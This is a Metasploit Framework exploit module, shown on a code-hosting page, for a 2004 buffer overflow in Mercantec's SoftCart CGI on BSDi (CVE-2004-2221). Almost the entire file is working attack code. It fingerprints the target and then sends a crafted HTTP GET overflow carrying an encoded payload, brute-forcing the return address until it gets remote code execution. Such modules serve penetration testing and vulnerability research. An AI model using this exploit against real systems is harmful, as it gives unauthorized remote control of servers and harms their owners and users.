Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/bsdi/softcart/mercantec_softcart.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Brute

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Mercantec SoftCart CGI Overflow',

17
        'Description' => %q{

18
          This is an exploit for an undisclosed buffer overflow

19
          in the SoftCart.exe CGI as shipped with Mercantec's shopping

20
          cart software.  It is possible to execute arbitrary code

21
          by passing a malformed CGI parameter in an HTTP GET

22
          request.  This issue is known to affect SoftCart version

23
          4.00b.

24
        },

25
        'Author' => [ 'skape', 'trew' ],

26
        'References' => [

27
          [ 'CVE', '2004-2221'],

28
          [ 'OSVDB', '9011'],

29
          [ 'BID', '10926'],

30
        ],

31
        'Privileged' => false,

32
        'Payload' => {

33
          'Space' => 1000,

34
          'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b\x7d\x28\x29\x3f\x5d\x5b\x00",

35
          'MinNops' => 16,

36
          'Prepend' => "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00\x00\x07\x00",

37
          'PrependEncoder' => "\x83\xec\x7f"

38
        },

39
        'Platform' => 'bsdi',

40
        'Targets' => [

41
          [

42
            'BSDi/4.3 Bruteforce',

43
            {

44
              'Bruteforce' =>

45
                {

46
                  'Start' => { 'Ret' => 0xefbf3000 },

47
                  'Stop' => { 'Ret' => 0xefbffffc },

48
                  'Step' => 0

49
                }

50
            },

51
          ],

52
        ],

53
        'DisclosureDate' => '2004-08-19',

54
        'DefaultTarget' => 0,

55
        'Notes' => {

56
          'Stability' => [CRASH_SERVICE_RESTARTS],

57
          'Reliability' => [REPEATABLE_SESSION],

58
          'SideEffects' => [IOC_IN_LOGS]

59
        }

60
      )

61
    )

62


63
    register_options(

64
      [

65
        OptString.new('URI', [ false, 'The target CGI URI', '/cgi-bin/SoftCart.exe' ])

66
      ]

67
    )

68
  end

69


70
  def brute_exploit(address)

71
    if !@mercantec

72
      res = send_request_raw({

73
        'uri' => normalize_uri(datastore['URI'])

74
      }, 5)

75
      @mercantec = res && res.body && res.body =~ /Copyright.*Mercantec/

76
      fail_with(Failure::NotFound, 'The target is not a Mercantec CGI') if !@mercantec

77
    end

78


79
    buffer =

80
      'MAA+scstoreB' +

81
      rand_text_alphanumeric(512) +

82
      [address['Ret']].pack('V') +

83
      'MSF!' +

84
      [address['Ret'] + payload.encoded.length].pack('V') +

85
      payload.encoded

86


87
    print_status("Trying #{'%.8x' % address['Ret']}...")

88
    send_request_raw({

89
      'uri' => normalize_uri(datastore['URI']),

90
      'query' => buffer

91
    }, 5)

92


93
    handler

94
  end

95
end

96


97